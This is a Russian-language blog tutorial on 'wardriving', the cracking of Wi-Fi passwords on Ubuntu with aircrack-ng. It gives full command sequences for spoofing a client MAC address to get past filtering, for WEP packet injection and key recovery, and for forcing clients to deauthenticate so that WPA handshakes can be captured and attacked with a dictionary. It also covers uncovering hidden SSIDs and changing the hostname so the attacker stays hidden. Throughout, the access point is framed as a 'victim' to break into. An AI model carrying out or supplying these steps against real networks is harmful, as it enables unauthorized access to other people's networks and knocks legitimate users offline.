Categories: Wi-Fi

Взлом пароля WIFI, вардрайвинг на Ubuntu.

Вардрайвинг (англ. Wardriving) — процесс поиска и взлома пароля уязвимых точек доступа беспроводных сетей Wi-Fi человеком либо группой лиц, оснащенных переносным компьютером с Wi-Fi-адаптером. При этом для пространственного поиска и локализации точки используется транспортное средство (отсюда и название — боевое вождение). Подробнее…

Для данных целей имеем:

  • Ноутбук Asus EeePC 1005P c Ubuntu 10.04 (12.04 собственно LTS оно лучше) на борту
  • Wi-Fi точку (наша жертва)
  • Wi-Fi клиента у Wi-Fi точке
  • Руки, желательно две

Готовимся. Ставим пакет aircrack-ng и macchanger

sudo apt-get install aircrack-ng macchanger

Начиная с версии Ubuntu 12.04, aircrack-ng не содержится в репозиториях Ubuntu. По этой причине придется либо ставить из deb пакета (скачать можнотут) или собирать самим вот так:

sudo wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1

Отредактируем файл common.mak заменив строку:

CFLAGS          ?= -g -W -Wall -Werror -O3

Строкой:

CFLAGS          ?= -g -W -Wall -O3

Все далее собираем и устанавливаем:

sudo make
sudo make install

Теория. Точки бывают открытые или закрытые. Открытые собственно нечего ломать, берем и заходим. Единственное что может помешать так это фильтрация по mac адресам. Обойти ее можно так:

sudo airodump-ng wlan0

Смотрим за точкой и ее клиентами. Если нет клиентов, то ждем их. Запоминаем mac адрес клиента и:

sudo ifconfig wlan0 down
sudo macchanger wlan0 --mac=00:11:22:33:44:55
sudo ifconfig wlan0 up

тут 00:11:22:33:44:55 это mac адрес клиента Wi-Fi точки (нашей жертвы). Ну и все подключаемся к точке.

Далее точка у нас закрытая с шифрованием WEP.

Пояснение. Сначала мы смотрим что за точка, ее mac адрес, канал на котором она работает и ssid

sudo airodump-ng wlan0

Узнаем свой MAC адрес

ifconfig wlan0

Имеем

  • Мой MAC адрес: 1C:4B:D6:B8:23:E5
  • MAC адрес точки доступа: 00:14:D1:4B:06:7E
  • SSID точки доступа: ClonNET
  • Канал точки доступа: 6

Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга.

sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0 6

Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:

sudo ifconfig mon0 down
sudo macchanger mon0 --mac=00:11:22:33:44:55
sudo ifconfig mon0 up

Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):

sudo vim /etc/hostname
#Например qwhjvsda
sudo vim /etc/hosts
#Во второй строке тоже самое: qwhjvsda

Ловим пакеты от нашей точки.

sudo airodump-ng mon0 -w wep -c 6 --bssid 00:14:d1:4b:06:7e

Тут mon0 — интерфейс созданный airmon-ng, 6 — канал точки доступа, 00:14:d1:4b:06:7e — ее мак адрес. wep — имя файлов с данными. Можно принципе ждать, но лучше ускорится =) В новой консоли делаем следующее:

sudo aireplay-ng -1 0 -e ClonNET -a 00:14:D1:4B:06:7E 
   -h 1C:4B:D6:B8:23:E5 mon0
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF 
   -b 00:14:D1:4B:06:7E -h 1C:4B:D6:B8:23:E5 mon0

Тут ClonNET — ssid точки доступа, 00:14:D1:4B:06:7E — ее MAC адрес, 1C:4B:D6:B8:23:E5 — наш MAC адрес, mon0 — наш интерфейс. Пакеты заметно полились быстрее в первой консоли с airodump-ng. Теперь можно ломать.

aircrack-ng -P 1 wep*.cap

Тут wep*.cap — имя файлов что указано было выше. Процесс подумает, посчитает и выдаст нам ключ к сети, если не выдаст то скажет сколько еще пакетов нам с Вами собрать.

[ad name=»Alfa»]

Дело в том, что при взламывании WPA handshake (пакет авторизации) получить можно только в процессе авторизации клиента. По этой причине нам нужен клиент который работает с точкой доступа и заставить его переавторизоваться.

sudo airodump-ng wlan0

Узнаем свой MAC адрес

ifconfig wlan0

Имеем

  • Мой MAC адрес: 1C:4B:D6:B8:23:E5
  • MAC адрес точки доступа: 00:14:D1:4B:06:7E
  • Канал точки доступа: 6
  • Клиент точки доступа: 00:25:D3:24:B5:DF

Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга. Да канал можно не указывать, как это я делал в первый раз.

sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0

Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:

sudo ifconfig mon0 down
sudo macchanger mon0 --mac=00:11:22:33:44:55
sudo ifconfig mon0 up

Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):

sudo vim /etc/hostname
#Например qwhjvsda
sudo vim /etc/hosts
#Во второй строке тоже самое: qwhjvsda

Ловим пакеты от нашей точки.

sudo airodump-ng -c 6 -w cap mon0

Тут немного я упростил. Так как у меня всего одна точка была в зоне видимости, то я писал в файл cap все пакеты с 6 канала со всех точек (в моем случае она одна была). Если точек больше смотри по аналогии с wep шифрованием. В другой консоли делаем следующее:

sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e 
   -c 00:25:D3:24:B5:DF mon0

Так мы заставили клиента с MAC адресом 00:25:D3:24:B5:DF переавторизоваться тем самым в первой консоли сверху появится надпись handshake — т.е. мы поймали пакет авторизации. Можно воспользоватьсяWireshark’ом и отслеживать пакеты авторизации по протоколу eapol. Ломаем.

aircrack-ng -w pass.txt cap-01.cap

А теперь суть. WPA ломать простым перебором плохая идея. На это уйдут годы. По этой причине перебор организуем по словарю. В данном примере словарь pass.txt. Вообще словари Вы можете найти тут.
Перебор по словарю поможет только в случае легкого пароля, иначе сломать практически нереально. Однако при включенной опции WPS на точке доступа взломать ее становится многим проще. Как это сделать я описал тут.

[ad name=»MiBand2″]

Некоторая неприятность — Hidden SSID. Это когда в airodump-ng вместо SSID точки доступы вы видите <length:?> где вместо ? стоит число (это число длина SSID). В этом случае для определения SSID нам нужно либо дождаться клиента к точке доступа, тогда airodump-ng сам определит ее имя, либо вытолкнуть подключенного клиента к примеру вот так:

sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e 
   -c 00:25:D3:24:B5:DF mon0

Тут 00:25:D3:24:B5:DF — MAC клиента, 00:14:d1:4b:06:7e — MAC точки доступа. Собственно все. Благодаря этому инструментарию в принципе можно сломать любую Wi-Fi точку доступа.

Появление ошибки:
mon0 is on channel -1, but the AP uses channel 6 после строки:

sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e 
   -c 00:25:D3:24:B5:DF mon0

Для начала надо при создании интерфейса mon0 указать канал:

sudo airmon-ng start wlan0 6

Если это не помогло тогда попробуйте еще вот такую команду:

sudo iwconfig mon0 channel 6

6 — это для примера, в Вашем случае тот канал на котором работает точка доступа. Если после всех попыток по прежнему появляется данная ошибка, то, как заметил Quantum в комментариях, необходимо патчить драйвера. Статья которую привел Quantum в моем случае не помогла по видимому из-за версии драйверов, по этой причине привожу другую которая сработала: Вот она.

Далее необходимые команды:

sudo apt-get install build-essential
wget http://wireless.kernel.org/download/compat-wireless-2.6/
   compat-wireless.tar.bz2
 
tar -jxf compat-wireless.tar.bz2
cd compat-wireless*
wget http://patches.aircrack-ng.org/
   mac80211.compat08082009.wl_frag+ack_v1.patch
 
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/
   channel-negative-one-maxim.patch
 
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
#Иногда нужно подправить следующий участок
gedit scripts/update-initramfs
#*** Найдите подобную строку: KLIB=/lib/modules/2.6.31-wl/build
#*** Исправьте на это: KLIB=/lib/modules/$(uname -r)/build
#Собираем и устанавливаем
make && sudo make install
#Перезагрузка
sudo reboot

После перезагрузки проверяем. Если что то пошло не так то отменить данные действия можно следующей командой:

sudo make uninstall

Также попробуйте более свежую версию драйверов например эти или выберите наиболее актуальные тут.

Click to rate this post!
[Total: 20 Average: 3.3]
cryptoworld

Специалист в области кибер-безопасности. Работал в ведущих компаниях занимающихся защитой и аналитикой компьютерных угроз. Цель данного блога - простым языком рассказать о сложных моментах защиты IT инфраструктур и сетей.

View Comments

Recent Posts

Лучший адаптер беспроводной сети для взлома Wi-Fi

Чтобы взломать сеть Wi-Fi с помощью Kali Linux, вам нужна беспроводная карта, поддерживающая режим мониторинга…

12 месяцев ago

Как пользоваться инструментом FFmpeg

Работа с консолью считается более эффективной, чем работа с графическим интерфейсом по нескольким причинам.Во-первых, ввод…

1 год ago

Как создать собственный VPN-сервис

Конечно, вы также можете приобрести подписку на соответствующую услугу, но наличие SSH-доступа к компьютеру с…

1 год ago

ChatGPT против HIX Chat: какой чат-бот с искусственным интеллектом лучше?

С тех пор как ChatGPT вышел на арену, возросла потребность в поддержке чата на базе…

1 год ago

Разведка по Wi-Fi и GPS с помощью Sparrow-wifi

Если вы когда-нибудь окажетесь в ситуации, когда вам нужно взглянуть на спектр беспроводной связи, будь…

1 год ago

Как обнаружить угрозы в памяти

Elastic Security стремится превзойти противников в инновациях и обеспечить защиту от новейших технологий злоумышленников. В…

1 год ago